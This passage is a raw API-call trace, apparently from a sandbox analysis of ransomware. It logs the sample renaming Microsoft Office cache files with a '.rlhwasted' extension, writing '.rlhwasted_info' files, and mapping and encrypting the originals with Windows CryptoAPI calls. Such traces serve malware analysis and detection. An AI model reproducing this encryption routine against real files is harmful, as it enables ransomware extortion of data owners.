lpString1=0x6eb818, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0184.703] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.703] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.703] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x5ac [0184.703] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x6a0000 [0184.703] CloseHandle (hObject=0x12c) returned 1 [0184.706] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.707] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x7137c8 | out: pbBuffer=0x7137c8) returned 1 [0184.707] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.707] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.708] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.708] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.717] SetEndOfFile (hFile=0x128) returned 1 [0184.719] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x714120 | out: hHeap=0x6b0000) returned 1 [0184.719] CloseHandle (hObject=0x128) returned 1 [0184.720] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.720] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec588 | out: hHeap=0x6b0000) returned 1 [0184.721] _aulldvrm () returned 0x0 [0184.721] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.721] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.721] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.721] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0184.721] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a8) returned 0x6eb780 [0184.722] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.722] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x714120 [0184.722] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.722] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x714120 | out: pbBuffer=0x714120) returned 1 [0184.722] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.722] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.723] WriteFile (in: hFile=0x128, lpBuffer=0x714120*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x714120*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.724] SetEndOfFile (hFile=0x128) returned 1 [0184.724] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.724] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x714120 | out: hHeap=0x6b0000) returned 1 [0184.724] lstrcpyW (in: lpString1=0x6eb81e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.rlhwasted")) returned 1 [0184.726] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.726] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0184.726] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x91975 [0184.726] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x12b0000 [0184.726] CloseHandle (hObject=0x124) returned 1 [0184.754] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.755] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x7137c8 | out: pbBuffer=0x7137c8) returned 1 [0184.755] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.755] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.756] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.756] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.765] SetEndOfFile (hFile=0x128) returned 1 [0184.767] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.767] CloseHandle (hObject=0x128) returned 1 [0184.768] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.768] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0184.769] _aulldvrm () returned 0x0 [0184.769] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.769] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.769] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.769] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0184.769] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c6) returned 0x713780 [0184.770] lstrcpyW (in: lpString1=0x71383c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.770] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0184.770] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.770] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0184.770] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.770] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.771] WriteFile (in: hFile=0x128, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.772] SetEndOfFile (hFile=0x128) returned 1 [0184.772] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.772] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.772] lstrcpyW (in: lpString1=0x71383c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.rlhwasted")) returned 1 [0184.777] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.777] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0184.777] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x741 [0184.777] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x741) returned 0x6a0000 [0184.777] CloseHandle (hObject=0x124) returned 1 [0184.780] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.781] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0184.781] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.782] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.783] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.783] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.805] SetEndOfFile (hFile=0x128) returned 1 [0184.807] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0184.807] CloseHandle (hObject=0x128) returned 1 [0184.812] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713780 | out: hHeap=0x6b0000) returned 1 [0184.812] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb668 | out: hHeap=0x6b0000) returned 1 [0184.813] _aulldvrm () returned 0x0 [0184.813] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.814] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.814] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.814] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0184.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0184.814] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.814] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x708d90 [0184.814] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.815] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x708d90 | out: pbBuffer=0x708d90) returned 1 [0184.815] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.815] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0184.815] WriteFile (in: hFile=0x128, lpBuffer=0x708d90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x708d90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.817] SetEndOfFile (hFile=0x128) returned 1 [0184.817] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.817] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x708d90 | out: hHeap=0x6b0000) returned 1 [0184.817] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.rlhwasted")) returned 1 [0184.818] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.818] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0184.818] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x15b5 [0184.818] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0x6a0000 [0184.819] CloseHandle (hObject=0x12c) returned 1 [0184.829] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0184.830] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0184.830] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.830] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0184.831] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0184.831] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.843] SetEndOfFile (hFile=0x128) returned 1 [0184.849] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.849] CloseHandle (hObject=0x128) returned 1 [0184.851] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0184.851] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec680 | out: hHeap=0x6b0000) returned 1 [0184.851] _aulldvrm () returned 0x0 [0184.851] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0184.852] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0184.852] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.852] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0184.852] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b0) returned 0x70cfe8 [0184.852] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0184.852] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0184.852] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0184.853] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0184.853] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0184.853] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0184.861] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0184.862] SetEndOfFile (hFile=0x124) returned 1 [0184.863] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.863] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0184.863] lstrcpyW (in: lpString1=0x70d08e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0184.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.rlhwasted")) returned 1 [0184.864] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0184.864] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0184.864] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x333 [0184.864] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x6a0000 [0184.864] CloseHandle (hObject=0x12c) returned 1 [0185.097] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.098] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6eb5b8 | out: pbBuffer=0x6eb5b8) returned 1 [0185.098] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.098] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0185.099] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.099] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.108] SetEndOfFile (hFile=0x124) returned 1 [0185.110] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0185.110] CloseHandle (hObject=0x124) returned 1 [0185.111] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0185.112] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec780 | out: hHeap=0x6b0000) returned 1 [0185.112] _aulldvrm () returned 0x0 [0185.112] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0185.113] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.113] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0185.113] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a4) returned 0x6eb570 [0185.113] lstrcpyW (in: lpString1=0x6eb60a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.113] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0185.113] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0185.114] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0185.114] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.114] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.114] WriteFile (in: hFile=0x124, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.115] SetEndOfFile (hFile=0x124) returned 1 [0185.115] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.115] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0185.115] lstrcpyW (in: lpString1=0x6eb60a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.rlhwasted")) returned 1 [0185.117] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 